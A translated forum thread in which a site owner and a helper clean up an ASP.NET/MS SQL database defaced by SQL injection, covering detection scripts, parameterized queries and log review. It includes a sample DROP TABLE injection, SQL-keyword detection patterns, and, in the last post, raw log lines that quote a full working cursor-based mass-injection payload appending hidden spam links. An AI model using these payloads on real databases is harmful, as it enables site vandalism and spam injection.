Topic: Searching for text by pattern · date added: 11.12.2014 / 20:29
Topic author: anka_x

Good afternoon.

Disaster struck: the database was hacked and malicious additions were inserted everywhere. All the insertions begin with the code "<div style="display:none">" and end with "</div>". Between the tags there are various text fragments and links. I would like to find these pieces programmatically and destroy them. Please help me put together a search pattern. Thank you.
Technologies: ASP .NET
 
Reply #1 · date added: 11.12.2014 / 22:55
Reply author: Алексей Немиро

Is the text different each time, or a few identical variations? If it is identical, fixing it with SQL will be faster.

How was it hacked? Injection, or did the password leak? First you need to close the hole, otherwise cleaning up the consequences will be pointless.

Are backups made often? It may be easier to restore.
 
Reply #2 · date added: 12.12.2014 / 08:01
Reply author: anka_x

The text probably comes in many variations, there are more than 20 of them, and I'm not sure I know them all.
Backups are made and kept for 2 weeks, but the database was hacked earlier.

I don't know yet how it was hacked. I will change the password, of course. Code like this, for example, was added to the item descriptions:

<div style="display:none">abortion pills online <a href="http://www.***.com/blog/template">click</a> abortion pills online</div>

That is, the changes are not visible to visitors, but they are there in the code.
 
Reply #3 · date added: 12.12.2014 / 10:56
Reply author: Алексей Немиро

If it is SQL injection, that will be of no use at all.

How is the work with the database done?

Are there queries in the code like:
cmd.CommandText = "SELECT * FROM table WHERE id = " + Request("id") + " ORDER BY name"
i.e. where data from Request or from other elements (text fields, etc.) or variables is inserted into the SQL query.

Such queries are vulnerable to SQL injection: an attacker can easily alter the SQL query and add their own.
In the example shown above, an attacker can add their own query in the id parameter:
http://example.org/page.aspx?id=0;DROP TABLE table--
Thus:
cmd.CommandText = "SELECT * FROM table WHERE id = " + Request("id") + " ORDER BY name"
the query will be:
SELECT * FROM table WHERE id = 0;DROP TABLE table-- ORDER BY name
As you can see, this results in two queries: the first does nothing, and the second, if there are sufficient permissions (there usually are), will delete the table named table from the database. The remainder of the first query simply ends up in a comment.

The requests are usually encoded to make them harder to detect. But fragments of SQL code will still be visible in the page addresses.
You can search the statistics (such as Яндекс.Метрика, or the LiveInternet, Mail.Ru counters, etc.) for addresses into which someone tries to insert suspicious SQL code. Then check that the database queries in the server-side code of those pages are safe.

And only then deal with the consequences.

By the way, where is the database connection string stored? In web.config, I hope? If it is stored some other way, it could have been exposed on the site when exceptions occurred (depends on the site configuration).
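
The search for suspicious SQL in page addresses described in reply #3 can also be run over the web server's own access log. The sketch below is an added example, not code from the thread: it assumes an IIS W3C log with a #Fields header, the marker list is a heuristic chosen for this example, and the sample log lines are constructed.

```python
import re
from urllib.parse import unquote_plus

# Heuristic markers of SQL inside a request field. The list is an assumption
# of this example and is not exhaustive.
SQL_MARKERS = re.compile(
    r"""
      ;\s*(?:declare|drop|exec|execute|update|insert|delete|alter|create)\b
    | \bunion\s+(?:all\s+)?select\b
    | '\s*(?:or|and)\b
    | \b(?:information_schema|sysobjects|syscolumns)\b
    | --\s*$
    """,
    re.IGNORECASE | re.VERBOSE,
)

# All three fields are supplied by the client, so all three are inspected.
WATCHED_FIELDS = ("cs-uri-query", "cs(User-Agent)", "cs(Referer)")

# Constructed sample log (not taken from a real server).
SAMPLE_LOG = [
    "#Software: Microsoft Internet Information Services 7.5",
    "#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip cs(User-Agent) cs(Referer) sc-status",
    "2015-02-23 17:20:01 GET /info.aspx infoid=20 192.0.2.10 Mozilla/5.0+(Windows+NT+6.1) http://www.site.example/ 200",
    "2015-02-23 17:20:05 GET /page.aspx id=0%3BDROP%20TABLE%20table-- 198.51.100.7 Mozilla/5.0 - 200",
    "2015-02-23 17:20:09 GET /info.aspx infoid=20 198.51.100.7 Mozilla/5.0';declare+@d+varchar(10)-- - 302",
    "2015-02-23 17:20:12 GET /news.aspx id=0%253BDROP%2520TABLE%2520table 198.51.100.7 Mozilla/5.0 - 500",
]


def decode_field(value, max_rounds=3):
    """URL-decode repeatedly (bounded) so double-encoded input is seen too."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_iis_log(lines):
    """Return one finding per client-controlled field that carries a marker."""
    fields, findings = [], []
    for line_no, line in enumerate(lines, start=1):
        line = line.strip()
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # column names for what follows
            continue
        if not line or line.startswith("#") or not fields:
            continue
        values = line.split(" ")
        if len(values) == len(fields):
            entry = dict(zip(fields, values))
            candidates = [(n, entry[n]) for n in WATCHED_FIELDS if n in entry]
        else:
            # Column count is off (truncated or unexpected entry): do not
            # skip it, inspect the whole line instead.
            entry = {}
            candidates = [("(whole line)", line)]
        for name, raw in candidates:
            if raw == "-":                     # IIS writes "-" for an empty field
                continue
            match = SQL_MARKERS.search(decode_field(raw))
            if match:
                findings.append({
                    "line": line_no,
                    "ip": entry.get("c-ip", "-"),
                    "page": entry.get("cs-uri-stem", "-"),
                    "field": name,
                    "marker": match.group(0),
                })
    return findings


def pages_to_review(findings):
    """Pages whose server-side database queries should be checked first."""
    return sorted({f["page"] for f in findings})


if __name__ == "__main__":
    for f in scan_iis_log(SAMPLE_LOG):
        print(f)
    print("review:", pages_to_review(scan_iis_log(SAMPLE_LOG)))
```

A hit only shows that someone probed the page; whether the page is actually vulnerable is decided by how its server-side code builds the query.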
 
Reply #4 · date added: 12.12.2014 / 11:08
Reply author: Алексей Немиро

For the cleanup, if:
1. The injected text always starts with: <div style="display:none">
2. The injected text always ends with: </div>
3. There are no other </div> tags between <div style="display:none"> and </div>.
4. Normal text cannot contain <div style="display:none">...</div> (in theory there should be no style="display:none", since search engines do not like it; such blocks are usually hidden with JavaScript or with CSS classes, which would be hard for an attacker to do, it would have to be done by hand, and here most likely a robot did it).

Then at the SQL level you can:
1. Check all fields and find the substrings <div style="display:none"> and </div>.
2. Delete the text between these substrings.

Another option: if the malicious text is at the end or at the beginning of the normal text, it can be cut off. If at the end, look for the first occurrence of <div style="display:none">. If at the beginning, look for the first occurrence of </div>.

Placing the malicious text at the end or at the beginning is easiest for the attacker, since no additional analysis of the data is needed, which would increase the amount of code, and for an injection that is critical (the size of the query string in a URL is limited).
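
A search pattern for the blocks described by conditions 1-4 in reply #4, as an added example that is not code from the thread. It goes slightly beyond the exact marker by tolerating case, spacing and quote differences, and it builds a dry-run plan instead of changing anything; the function names and the sample rows are constructed for this example.

```python
import re

# Opening marker from the thread, tolerant of case, spacing and quote style
# (the tolerance is this example's generalization).
OPEN_RE = r"""<div\s+style\s*=\s*["']\s*display\s*:\s*none\s*;?\s*["']\s*>"""
# Non-greedy: from the opening marker to the nearest </div> (condition 3).
BLOCK = re.compile(OPEN_RE + r"(.*?)</div\s*>", re.IGNORECASE | re.DOTALL)
OPEN_ONLY = re.compile(OPEN_RE, re.IGNORECASE)
NESTED_DIV = re.compile(r"<div\b", re.IGNORECASE)

# Constructed sample rows: (row id, field text).
SAMPLE_ROWS = [
    (1, 'Plain description with a visible <div class="note">note</div>.'),
    (2, 'Description of item A.<div style="display:none">spam text '
        '<a href="http://spam.example/">click</a> spam text</div>'),
    (3, "Intro.\n<DIV STYLE='display: none'>spam</div>\nOutro."),
    (4, 'Text <div style="display:none">no closing tag'),
    (5, 'Text <div style="display:none">a<div>b</div>c</div>'),
]


def strip_hidden_blocks(text):
    """Remove every hidden block; return (cleaned, removed, needs_review)."""
    matches = list(BLOCK.finditer(text))
    removed = [m.group(0) for m in matches]
    cleaned = BLOCK.sub("", text)
    needs_review = (
        # Opening marker without a closing </div>: there is no safe place
        # to stop cutting, so a person has to look at the row.
        OPEN_ONLY.search(cleaned) is not None
        # Condition 3 violated: a <div> inside the block means the nearest
        # </div> was not the real end and an orphan </div> is left behind.
        or any(NESTED_DIV.search(m.group(1)) for m in matches)
    )
    return cleaned, removed, needs_review


def plan_cleanup(rows):
    """Dry run over (row_id, text) pairs.

    Returns (updates, review): updates holds (row_id, cleaned_text,
    removed_blocks) for rows that can be fixed automatically, review holds
    the ids of rows that break the assumptions and need manual inspection.
    """
    updates, review = [], []
    for row_id, text in rows:
        cleaned, removed, needs_review = strip_hidden_blocks(text)
        if needs_review:
            review.append(row_id)
        elif removed:
            updates.append((row_id, cleaned, removed))
    return updates, review


if __name__ == "__main__":
    updates, review = plan_cleanup(SAMPLE_ROWS)
    for row_id, cleaned, removed in updates:
        print(row_id, repr(cleaned), "removed:", removed)
    print("manual review:", review)
```

Row 3 keeps the legitimate text that follows the block, which cutting everything from the first marker to the end of the field would lose. The removed blocks are returned so they can be kept as a record of what was injected.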
 
Reply #5 · date added: 12.12.2014 / 11:16
Reply author: Алексей Немиро

I once wrote an SQL query for checking a database for injected text.
The query checks all tables in the database and searches every field of type (n)text and (n)varchar for the text given in the @search variable.
The output is a list of the tables in which the given substring was found.

DECLARE @search nvarchar(max);
SET @search = '%<div style="display:none">%'; -- search string, the LIKE operator is used

CREATE TABLE #checked (id int identity not null, table_name varchar(255), found int null);

-- list of tables
DECLARE @t nvarchar(255);
SELECT TOP 1 @t = TABLE_NAME
FROM INFORMATION_SCHEMA.TABLES
WHERE TABLE_TYPE=N'BASE TABLE' ORDER BY TABLE_NAME ASC;

--SET @t = 'SNITZ_A_REPLY';

DECLARE @f int;

-- iterate over the tables until they run out
WHILE @@ROWCOUNT > 0 BEGIN
  SET @f = 0;

  PRINT 'Обработка таблицы ' + @t;
  -- get the text-type columns of the current table
  DECLARE @col_name varchar(255), @col_type varchar(255);
  CREATE TABLE #col_chck (id int identity not null, column_name varchar(255), found int);
  SELECT TOP 1 @col_name = COLUMN_NAME, @col_type = DATA_TYPE FROM INFORMATION_SCHEMA.COLUMNS
  WHERE TABLE_NAME = @t AND
  (DATA_TYPE = 'text' OR DATA_TYPE = 'ntext' OR DATA_TYPE = 'varchar' OR DATA_TYPE = 'nvarchar');
  -- take each column and count the rows in which it matches the search string
  WHILE @@ROWCOUNT > 0 BEGIN
    DECLARE @q nvarchar(max), @cf int;
    SET @cf = 0;
    SET @q =
    'SELECT @cnt = COUNT(*) FROM [' + @t + '] WHERE [' + @col_name + '] LIKE ''' + @search + ''';';

    -- run the query
    BEGIN TRY
      PRINT '..Поле ' + @col_name;
      EXEC sp_executesql @q, N'@cnt int OUTPUT', @cnt = @cf OUTPUT;
    END TRY
    BEGIN CATCH
      PRINT '****************************** ' + ERROR_MESSAGE();
    END CATCH;

    -- add the column to the log
    INSERT INTO #col_chck
    SELECT @col_name, ISNULL(@cf, 0);

    SET @f = @f + ISNULL(@cf, 0);

    -- remaining columns, excluding those already checked
    SELECT TOP 1 @col_name = COLUMN_NAME, @col_type = DATA_TYPE FROM INFORMATION_SCHEMA.COLUMNS
    WHERE TABLE_NAME = @t
    AND
    COLUMN_NAME NOT IN (SELECT column_name FROM #col_chck)
    AND
    (DATA_TYPE = 'text' OR DATA_TYPE = 'ntext' OR DATA_TYPE = 'varchar' OR DATA_TYPE = 'nvarchar');
  END;

  SELECT @f = SUM(found) FROM #col_chck;

  PRINT '...Найдено подстрок ' + CAST(ISNULL(@f, 0) AS nvarchar(10));

  DROP TABLE #col_chck;

  INSERT INTO #checked
  SELECT @t, ISNULL(@f, 0);

  -- check the remaining tables, excluding those already checked
  SELECT TOP 1 @t = TABLE_NAME
  FROM INFORMATION_SCHEMA.TABLES
  WHERE TABLE_TYPE=N'BASE TABLE' AND
  TABLE_NAME NOT IN (SELECT table_name FROM #checked)
  ORDER BY TABLE_NAME ASC;
END;

SELECT * FROM #checked WHERE found > 0 ORDER BY table_name ASC;

DROP TABLE #checked;
 
Reply #6 · date added: 12.12.2014 / 11:58
Reply author: Алексей Немиро

Another recovery option: if there is a backup without the injected text, you can restore it alongside and check the current database against the backup. Restore from the backup those texts that are found in the current database (if they have not changed). Then only the data that appeared later will remain to be checked (there should be considerably less of it; it may even be possible to go through it by hand). This can also be implemented at the SQL level.
 
Reply #7 · date added: 12.12.2014 / 17:06
Reply author: anka_x

Thank you very much, Алексей, for such a detailed and thorough investigation of the problem.
Of course, the site uses queries like Request("id"), just as this page of your forum does.
I'll try determining the length of Request("id") at the top of the page and redirecting everything longer than 5 characters (for example). Is that a proper way to do it?

All the insertions are located at the end of the text. Following your tip, I'll try finding the first occurrence of <div style="display:none"> (which I have never used) and deleting everything to the end of the text.
 
Reply #8 · date added: 12.12.2014 / 17:23
Reply author: Алексей Немиро

"I'll try determining the length of Request("id") at the top of the page and redirecting everything longer than 5 characters (for example). Is that a proper way to do it?"
No. The only correct solution is to use parameterized queries.

The SqlCommand object has a Parameters property, through which parameters can be inserted into an SQL query. With it you don't need to think about the format and safety of the data being passed, because everything has already been thought out and built, and its reliability has been proven over the years.

A safe database query should be built as follows:
Dim cmd As New SqlCommand("SELECT * FROM tableName WHERE id = @id")
cmd.Parameters.Add("@id", SqlDbType.Int).Value = Request("id")

The @id variable in the SQL query will be automatically replaced with the value of Request("id").
The data type will be checked in the process. If the type turns out to be wrong, an exception is raised and the query is not executed.
In string types quotes are escaped, which rules out injecting subqueries into query parameters.
For dates the format is normalized automatically, depending on the site and SQL Server settings.

Dim cmd As New SqlCommand("INSERT INTO tableName (title, main_text, hit, date_created) VALUES (@title, @main_text, @hit, @date_created)")
cmd.Parameters.Add("@title", SqlDbType.NVarChar, 100).Value = "Привет, мир!"
cmd.Parameters.Add("@main_text", SqlDbType.NVarChar).Value = "много текста может быть здесь"
cmd.Parameters.Add("@hit", SqlDbType.Int).Value = 123
cmd.Parameters.Add("@date_created", SqlDbType.DateTime).Value = Now
 
Reply #9 · date added: 12.12.2014 / 17:24
Reply author: anka_x

I went into Я.Метрика and there really are some additions to the addresses that I have never used. For example: fmode=inject or relation=parent...
 
Reply #10 · date added: 12.12.2014 / 17:34
Reply author: Алексей Немиро

"All the insertions are located at the end of the text. Following your tip, I'll try finding the first occurrence of <div style="display:none"> (which I have never used) and deleting everything to the end of the text."
If the substring <div style="display:none"> definitely does not occur in other parts of the text, a simple delete query could look like this:

-- this is a test example that shows how it works
DECLARE @killFrom nvarchar(max)
SET @killFrom = '<div style="display:none">'

DECLARE @text nvarchar(max);

SET @text ='какой-то текс
раз
два три<div style="display:none">11111</div>'

SELECT LEFT(@text, CHARINDEX(@killFrom, @text) - 1)

-- test example 2: shows that text after the injected block will also be deleted
-- (the literal holds text that stays unchanged, then the injected div, then
-- text that follows the injected block and is deleted together with it)
DECLARE @killFrom nvarchar(max)
SET @killFrom = '<div style="display:none">'

DECLARE @text nvarchar(max);

SET @text ='какой-то текст, который останется без изменений
<div style="display:none">этот текст будет удален, начиная с тега div</div>

этот текст после внедренного и он тоже будет удален'

SELECT LEFT(@text, CHARINDEX(@killFrom, @text) - 1)

For use in real conditions (without everything shown above):

-- the query finds the text '<div style="display:none">' in the fieldName field and deletes everything from that string to the end
DECLARE @killFrom nvarchar(max)
SET @killFrom = '<div style="display:none">'

UPDATE tableName SET fieldName = LEFT(fieldName , CHARINDEX(@killFrom, fieldName) - 1)
WHERE CHARINDEX(@killFrom, fieldName) <> 0;

IMPORTANT: don't forget to make a backup, so that you can restore if anything goes wrong.
 
Reply #11 · date added: 12.12.2014 / 18:00
Reply author: anka_x

"A safe database query should be built as follows:"

Dim cmd As New SqlCommand("SELECT * FROM tableName WHERE id = @id")
cmd.Parameters.Add("@id", SqlDbType.Int).Value = Request("id")


When I add a parameter to my query, it complains:
BC30456: "Parameters" не является членом "System.Data.OleDb.OleDbDataAdapter".

The query is this:
DBCommand = New OleDbDataAdapter _
("Select * From Pressa Where PressaID = @PressaID", DBConnSite)
DBCommand.Parameters.Add("@PressaID", SqlDbType.Int).Value = Request.QueryString("PressaID")
 
Reply #12 · date added: 12.12.2014 / 18:10
Reply author: Алексей Немиро

Is the database Access?
Then everything I said above can be ignored. My answers apply to SQL Server.
I haven't worked with Access for a long time, so I can't recommend anything offhand.

Access is bad for websites, very bad, to put it mildly.

For OleDb you need to use OleDb, not SqlDb. Access has different types; Studio itself will show in the enumeration which ones exist. Int is Integer.

With Access it is important to keep the order in which parameters are added the same in the query and in the Command.
DBCommand = New OleDbDataAdapter
DataAdapter is inconvenient; it is better to create a Command and simply pass it to the DataAdapter.
 
Reply #13 · date added: 12.12.2014 / 18:35
Reply author: anka_x

No, the database is MS SQL, but the site's code is very old. )


Dim DBCommand As OleDbDataAdapter
Dim DBConnSite as OleDbConnection = New OleDbConnection(System.Configuration.ConfigurationSettings.AppSettings("Site"))
 
Reply #14 · date added: 12.12.2014 / 18:47
Reply author: Алексей Немиро

And what, the work with the database is done through OleDb? It really works?

It would be better to replace the objects with the Sql ones.
Dim DBCommand As OleDbDataAdapter
Dim DBConnSite as OleDbConnection = New OleDbConnection(System.Configuration.ConfigurationSettings.AppSettings("Site"))

Dim conn As New SqlConnection(System.Configuration.ConfigurationSettings.AppSettings("Site"))
conn.Open()
Dim cmd As New SqlCommand("текст запроса тут", conn) ' the query text goes here
' parameters
cmd.Parameters.Add("@id", SqlDbType.Int).Value = Request("id")
' ...
' if a data table is needed, then
Dim table As New DataTable()
Dim adapter As New SqlDataAdapter(cmd)
adapter.Fill(table)
' done, table should now contain the data
conn.Close()
 
Reply #15 · date added: 12.12.2014 / 19:26
Reply author: anka_x

"And what, the work with the database is done through OleDb? It really works?"


Yes, it works, I'm surprised myself. )

Simply replacing OleDB with SQL doesn't work; I'll keep trying.

Attacks on the database usually come through the URL, or is it also possible through an asp:TextBox text form?
 
Reply #16 · date added: 12.12.2014 / 19:50
Reply author: Алексей Немиро

Through text fields it is harder, since a POST request has to be made. But it is also possible. You should always use parameterized queries, then there will be no problems.
 
Reply #17 · date added: 23.02.2015 / 21:26
Reply author: anka_x

Алексей, good afternoon.
Happy holiday to you!!! Stay healthy and happy! :)

I'm in trouble again... Today the database was damaged again, the scoundrels...
In the log files, among other things, I found lines in which I understood nothing; please take a look. What could this mean?

2015-02-23 17:25:48 GET /sitemap.xml - 217.69.134.52 HTTP/1.0 Mozilla/5.0+(compatible;+Linux+x86_64;+Mail.RU_Bot/Fast/2.0;++http://go.mail.ru/help/robots) - site.ru 200 22979 369 15
2015-02-23 17:25:49 GET /info.aspx infoid=20';declare%20@c%20cursor;declare%20@d%20varchar(4000);set%20@c=cursor%20for%20select%20'update%20%5B'%2BTABLE_NAME%2B'%5D%20set%20%5B'%2BCOLUMN_NAME%2B'%5D=%5B'%2BCOLUMN_NAME%2B'%5D%2Bcase%20ABS(CHECKSUM(NewId()))%257%20when%200%20then%20''''%2Bchar(60)%2B''div%20style=%22display:none%22''%2Bchar(62)%2B''online%20''%2Bchar(60)%2B''a%20href=%22http:''%2Bchar(47)%2Bchar(47)%2B''blog.businessdating.com''%2Bchar(47)%2B''page''%2Bchar(47)%2B''How-women-cheat%22''%2Bchar(62)%2Bcase%20ABS(CHECKSUM(NewId()))%253%20when%200%20then%20''wives%20that%20cheat''%20when%201%20then%20''redirect''%20else%20''most%20women%20cheat''%20end%20%2Bchar(60)%2Bchar(47)%2B''a''%2Bchar(62)%2B''%20women%20want%20men''%2Bchar(60)%2Bchar(47)%2B''div''%2Bchar(62)%2B''''%20else%20''''%20end'%20FROM%20sysindexes%20AS%20i%20INNER%20JOIN%20sysobjects%20AS%20o%20ON%20i.id=o.id%20INNER%20JOIN%20INFORMATION_SCHEMA.COLUMNS%20ON%20o.NAME=TABLE_NAME%20WHERE(indid=0%20or%20indid=1)%20and%20DATA_TYPE%20like%20'%25varchar'%20and(CHARACTER_MAXIMUM_LENGTH=-1%20or%20CHARACTER_MAXIMUM_LENGTH=2147483647);open%20@c;fetch%20next%20from%20@c%20into%20@d;while%20@@FETCH_STATUS=0%20begin%20exec%20(@d);fetch%20next%20from%20@c%20into%20@d;end;close%20@c-- 202.6.132.70 HTTP/1.0 
Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:24.0)+Gecko/20100101+Firefox/24.0';declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">online+<a+href="http://blog.businessdating.com/page/How-women-cheat">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''wives+that+cheat''+when+1+then+''redirect''+else+''most+women+cheat''+end++''</a>+women+want+men</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- http://google.com';declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">online+<a+href="http://blog.businessdating.com/page/How-women-cheat">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''wives+that+cheat''+when+1+then+''redirect''+else+''most+women+cheat''+end++''</a>+women+want+men</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- www.site.ru 302 458 3227 15
2015-02-23 17:25:49 GET /error.aspx aspxerrorpath=/info.aspx 202.6.132.70 HTTP/1.0 Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:24.0)+Gecko/20100101+Firefox/24.0';declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">online+<a+href="http://blog.businessdating.com/page/How-women-cheat">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''wives+that+cheat''+when+1+then+''redirect''+else+''most+women+cheat''+end++''</a>+women+want+men</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- http://google.com';declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">online+<a+href="http://blog.businessdating.com/page/How-women-cheat">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''wives+that+cheat''+when+1+then+''redirect''+else+''most+women+cheat''+end++''</a>+women+want+men</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- www.site.ru 200 7108 2038 0
2015-02-23 17:25:53 GET /info.aspx infoid=20;declare%20@c%20cursor;declare%20@d%20varchar(4000);set%20@c=cursor%20for%20select%20'update%20%5B'%2BTABLE_NAME%2B'%5D%20set%20%5B'%2BCOLUMN_NAME%2B'%5D=%5B'%2BCOLUMN_NAME%2B'%5D%2Bcase%20ABS(CHECKSUM(NewId()))%257%20when%200%20then%20''''%2Bchar(60)%2B''div%20style=%22display:none%22''%2Bchar(62)%2B''online%20''%2Bchar(60)%2B''a%20href=%22http:''%2Bchar(47)%2Bchar(47)%2B''blog.businessdating.com''%2Bchar(47)%2B''page''%2Bchar(47)%2B''How-women-cheat%22''%2Bchar(62)%2Bcase%20ABS(CHECKSUM(NewId()))%253%20when%200%20then%20''wives%20that%20cheat''%20when%201%20then%20''redirect''%20else%20''most%20women%20cheat''%20end%20%2Bchar(60)%2Bchar(47)%2B''a''%2Bchar(62)%2B''%20women%20want%20men''%2Bchar(60)%2Bchar(47)%2B''div''%2Bchar(62)%2B''''%20else%20''''%20end'%20FROM%20sysindexes%20AS%20i%20INNER%20JOIN%20sysobjects%20AS%20o%20ON%20i.id=o.id%20INNER%20JOIN%20INFORMATION_SCHEMA.COLUMNS%20ON%20o.NAME=TABLE_NAME%20WHERE(indid=0%20or%20indid=1)%20and%20DATA_TYPE%20like%20'%25varchar'%20and(CHARACTER_MAXIMUM_LENGTH=-1%20or%20CHARACTER_MAXIMUM_LENGTH=2147483647);open%20@c;fetch%20next%20from%20@c%20into%20@d;while%20@@FETCH_STATUS=0%20begin%20exec%20(@d);fetch%20next%20from%20@c%20into%20@d;end;close%20@c-- 202.6.132.70 HTTP/1.0 
Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:24.0)+Gecko/20100101+Firefox/24.0;declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">online+<a+href="http://blog.businessdating.com/page/How-women-cheat">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''wives+that+cheat''+when+1+then+''redirect''+else+''most+women+cheat''+end++''</a>+women+want+men</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- http://google.com;declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">online+<a+href="http://blog.businessdating.com/page/How-women-cheat">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''wives+that+cheat''+when+1+then+''redirect''+else+''most+women+cheat''+end++''</a>+women+want+men</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- www.site.ru 200 31410 3224 2703
2015-02-23 17:25:56 GET /info.aspx infoid=20);declare%20@c%20cursor;declare%20@d%20varchar(4000);set%20@c=cursor%20for%20select%20'update%20%5B'%2BTABLE_NAME%2B'%5D%20set%20%5B'%2BCOLUMN_NAME%2B'%5D=%5B'%2BCOLUMN_NAME%2B'%5D%2Bcase%20ABS(CHECKSUM(NewId()))%257%20when%200%20then%20''''%2Bchar(60)%2B''div%20style=%22display:none%22''%2Bchar(62)%2B''online%20''%2Bchar(60)%2B''a%20href=%22http:''%2Bchar(47)%2Bchar(47)%2B''blog.businessdating.com''%2Bchar(47)%2B''page''%2Bchar(47)%2B''How-women-cheat%22''%2Bchar(62)%2Bcase%20ABS(CHECKSUM(NewId()))%253%20when%200%20then%20''wives%20that%20cheat''%20when%201%20then%20''redirect''%20else%20''most%20women%20cheat''%20end%20%2Bchar(60)%2Bchar(47)%2B''a''%2Bchar(62)%2B''%20women%20want%20men''%2Bchar(60)%2Bchar(47)%2B''div''%2Bchar(62)%2B''''%20else%20''''%20end'%20FROM%20sysindexes%20AS%20i%20INNER%20JOIN%20sysobjects%20AS%20o%20ON%20i.id=o.id%20INNER%20JOIN%20INFORMATION_SCHEMA.COLUMNS%20ON%20o.NAME=TABLE_NAME%20WHERE(indid=0%20or%20indid=1)%20and%20DATA_TYPE%20like%20'%25varchar'%20and(CHARACTER_MAXIMUM_LENGTH=-1%20or%20CHARACTER_MAXIMUM_LENGTH=2147483647);open%20@c;fetch%20next%20from%20@c%20into%20@d;while%20@@FETCH_STATUS=0%20begin%20exec%20(@d);fetch%20next%20from%20@c%20into%20@d;end;close%20@c-- 202.6.132.70 HTTP/1.0 
